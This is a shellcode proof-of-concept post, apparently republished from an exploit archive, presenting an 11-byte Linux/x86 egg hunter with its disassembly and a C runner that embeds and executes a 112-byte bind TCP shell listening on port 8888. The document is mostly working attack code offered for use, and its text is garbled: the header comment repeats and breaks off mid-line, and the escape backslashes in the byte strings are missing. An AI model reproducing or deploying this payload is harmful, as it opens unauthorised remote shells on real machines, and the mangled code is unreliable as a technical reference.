/*
# Title: Linux/x86 - EggHunter Shellcode (11 Bytes)
# Author: Anurag Srivastava
# Tested on: i686 GNU/Linux
# Shellcode Length: 11
#Description: Smallest Null-Free Egg /*
# Title: Linux/x86 - EggHunter Shellcode (11 Bytes)
# Author: Anurag Srivastava
# Tested on: i686 GNU/Linux
# Shellcode Length: 11
#Description: Smallest Null-Free Egg Hunter Shellcode - 11 Bytes
Details:
1. Works with an executable EGG
2. Make sure you clear EDX, EAX registers in the shellcode before any other operations
#Reference : Nipun Jaswal (@nipunjaswal)
egg: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 40 inc eax
8048061: 81 38 90 47 90 4f cmp DWORD PTR [eax],0x4f904790
8048067: 75 f7 jne 8048060 <_start>
8048069: ff e0 jmp eax
===============POC by Anurag Srivastava=========================
*/
#include <stdio.h>
#include <string.h>
#define EXECEGG "x90x47x90x4f" //Executable EGG
unsigned char egg_hunter[] =
"x40x81x38x90x47x90x4fx75xf7xffxe0";
unsigned char egg[] =
EXECEGG
// Bind TCP Shell 112 Bytes Port 8888
"x31xdbx31xc0xb0x66xfexc3x56x6ax01x6a"
"x02x89xe1xcdx80x97x56x66x68x22xb8x66"
"x6ax02x89xe3x6ax10x53x57x31xdbxf7xe3"
"xb0x66xb3x02x89xe1xcdx80x56x57x31xdb"
"xf7xe3xb0x66xb3x04x89xe1xcdx80x31xdb"
"xf7xe3x56x56x57xb0x66xb3x05x89xe1xcd"
"x80x93x31xc9xb1x02xb0x3fxcdx80x49x79"
"xf9x31xc0x50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x89xc1x89xc2xb0x0bxcdx80";
void main()
{
printf("Length of Egg Hunter Shellcode: %d
", strlen(egg_hunter));
printf("Length of the Actual Shellcode: %d
", strlen(egg));
int (*ret)() = (int(*)())egg_hunter;
ret();
}
Linux x86 Egghunter Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 467